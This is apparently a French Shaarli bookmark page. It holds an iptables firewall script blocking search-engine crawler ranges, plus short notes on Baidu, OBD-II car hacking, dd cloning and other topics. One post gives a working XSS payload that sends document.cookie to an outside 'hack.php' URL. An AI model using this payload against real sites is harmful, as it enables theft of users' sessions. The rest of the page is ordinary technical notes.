#!/bin/bash
## Script iptables by BeAvEr
## update by Oros
## Règles iptables.
## http://doc.ubuntu-fr.org/iptables
## On flush iptables.
iptables -F
## On supprime toutes les chaînes utilisateurs.
iptables -X
## On drop tout le trafic entrant.
iptables -P INPUT DROP
## On drop tout le trafic sortant.
iptables -P OUTPUT DROP
## On drop le forward.
iptables -P FORWARD DROP
## On drop les scans XMAS et NULL.
iptables -A INPUT -p tcp --tcp-flags FIN,URG,PSH FIN,URG,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
## Dropper silencieusement tous les paquets broadcastés.
iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP
## Permettre à une connexion ouverte de recevoir du trafic en entrée.
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
## Permettre à une connexion ouverte de recevoir du trafic en sortie.
iptables -A OUTPUT -m state ! --state INVALID -j ACCEPT
## On accepte la boucle locale en entrée.
iptables -I INPUT -i lo -j ACCEPT
## On log les paquets en entrée.
iptables -A INPUT -j LOG
## On log les paquets forward.
iptables -A FORWARD -j LOG
iptables -A INPUT -p tcp -i eth0 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -i eth0 --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -i eth0 --dport ssh -j ACCEPT

#TMG
iptables -A INPUT -m iprange --src-range 85.159.236.253-85.159.236.254 -j DROP
iptables -A INPUT -m iprange --src-range 85.159.232.81-85.159.232.83 -j DROP
iptables -A INPUT -m iprange --src-range 193.107.240.1-193.107.240.4 -j DROP
iptables -I INPUT -s 82.138.81.211 -j DROP

#baidu
iptables -A INPUT -m iprange --src-range 119.63.192.0-119.63.192.255 -j DROP
iptables -A INPUT -m iprange --src-range 123.125.71.0-123.125.71.255 -j DROP
iptables -A INPUT -m iprange --src-range 180.76.15.0-180.76.15.255 -j DROP
iptables -A INPUT -m iprange --src-range 220.181.108.0-220.181.108.255 -j DROP

#google
iptables -A INPUT -m iprange --src-range 64.233.160.0-64.233.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.102.0.0-66.102.15.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.249.64.0-66.249.95.255 -j DROP
iptables -A INPUT -m iprange --src-range 72.14.192.0-72.14.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 74.125.0.0-74.125.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 209.85.128.0-209.85.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 216.239.32.0-216.239.63.255 -j DROP

#MSN/Live
iptables -A INPUT -m iprange --src-range 64.4.0.0-64.4.63.255 -j DROP
iptables -A INPUT -m iprange --src-range 65.52.0.0-65.55.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 131.253.21.0-131.253.47.255 -j DROP
iptables -A INPUT -m iprange --src-range 157.54.0.0-157.60.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 207.46.0.0-207.46.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 207.68.128.0-207.68.207.255 -j DROP

#Yahoo
iptables -A INPUT -m iprange --src-range 8.12.144.0-8.12.144.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.196.64.0-66.196.127.255 -j DROP
iptables -A INPUT -m iprange --src-range 66.228.160.0-66.228.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 67.195.0.0-67.195.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 68.142.192.0-68.142.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 72.30.0.0-72.30.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 74.6.0.0-74.6.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 98.136.0.0-98.139.255.255 -j DROP
iptables -A INPUT -m iprange --src-range 202.160.176.0-202.160.191.255 -j DROP
iptables -A INPUT -m iprange --src-range 209.191.64.0-209.191.127.255 -j DROP

exit 0
(Permalink)

(Permalink)

Une autre version plus simple :

<script>document.body.insertAdjacentHTML('beforeEnd', "<img src='https://xxxxxx.xxxxxxx/hack.php?cookie="+encodeURIComponent(document.cookie)+"'>");</script>;
(Permalink)

Baidu ne suis pas les consignes du robots.txt !
Bon comme il ne suit pas les directives, il se prend des bans ^_^
Sa plage d'IP : 180.76.15.* (baiduspider-180-76-15-*.crawl.baidu.com)
(Permalink)

Un réseau neuronal pour générer des textes écris à la main :-)
En gros, tu donnes donne un texte et il génère une image du texte comme si c'était écris à la main.
(Permalink)

En référence à ça :
https://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
http://www.metronews.fr/high-tech/des-experts-en-securite-prennent-le-controle-d-une-jeep-a-distance/mogv!VezNWjj2mhvU/
http://www.numerama.com/magazine/33758-500-000-voitures-piratables-et-controlables-a-distance-des-aujourd-hui.html

Voici quelques liens sur l'utilisation du port OBD-II pour communiquer avec l'ordinateur de bord des voitures :

Matériel nécessaire :
dongle ELM-327 USB (~12$)

Documentation :
https://en.wikipedia.org/wiki/OBD-II
https://en.wikipedia.org/wiki/OBD-II_PIDs
http://hackaday.com/2013/10/29/can-hacking-protocols/
http://hackaday.com/2013/10/21/can-hacking-introductions/
http://hackaday.com/2013/10/22/can-hacking-the-in-vehicle-network/

Programmes existants :
https://github.com/AustinMurphy/OBD2-Scantool
https://github.com/peterh/pyobd
https://pypi.python.org/pypi/obd/0.1.0

Exemples d'utilisation :
http://x0r.fr/blog/27
http://www.cowfishstudios.com/blog/obd-pitft-display-car-diagnostics-obd-ii-data-on-adafruits-pitft-touchscreen-display-for-raspberry-pi
http://www.instructables.com/id/OBD-Pi/
http://blog.brianhemeryck.me/how-to-interface-with-your-cars-ecu-through-obd2-and-python/
http://hackaday.com/2013/11/05/can-hacking-the-hardware/
http://www.caranddriver.com/features/can-your-car-be-hacked-feature
http://theksmith.com/software/hack-vehicle-bus-cheap-easy-part-1/
(Permalink)

Archive : https://web.archive.org/web/20150331101955/http://www.0x0ff.info/
Compte github : https://github.com/0x0ff
http://streisand.fr/article2/un-exemple-d-auto-censure
(Permalink)

via http://sebsauvage.net/links/?n2QwLw
(Permalink)

Je prends note :
pkill -USR1 ^dd
ou
apt-get install pv
dd if=/dev/sda | pv | dd of=/dev/sdc
ou
(pv -n /dev/sda | dd of=/dev/sdb bs=128M conv=notrunc,noerror) 2>&1 | dialog --gauge "Running dd command (cloning), please wait..." 10 70 0
via https://fralef.me/links/?gArOkQ
(Permalink)

via http://www.petitetremalfaisant.eu/shaarli/?sxaY_g
(Permalink)

PC qui respecte la liberté.
Utilisation du firmware libreboot.
(Permalink)

Je confirme. En faisant crtl+u, sur un site sur le quel je suis connecté j'ai bien la page de connexion.
Firefox fait bien un nouvel appel au site pour récupérer le code source (j'ai vérifié dans mes logs serveur).
WTF ?
(Permalink)

Yeeaaaah ça c'est cool :-D
(Permalink)

J'ai un serveur DNS (bind9) sur un Rapsberry-Pi B qui est utilisé par toutes les machines de mon réseau local.
Franchement, aucun problème de lourdeur, ça prend quasiment rien comme ressource :-D
via http://lehollandaisvolant.net/?id=20150718125821
(Permalink)

"Google considère dorénavant que ses véhicules autonomes sont plus fiables que des conducteurs humains."
Cool :-)
Bon maintenant, la question fatidique, on peut voir le code source ?
(Permalink)

via https://shaarli.cafai.fr/?QZZa8g
(Permalink)

via https://links.yome.ch/?H0D_hQ
(Permalink)

via https://links.maih.eu/?XQoaKQ
(Permalink)

Half-life \o/
via http://shaarli.callmematthi.eu/?A6zfDg
(Permalink)

Belle photo de Charon, le plus gros des 5 satellites de Pluton.
(Permalink)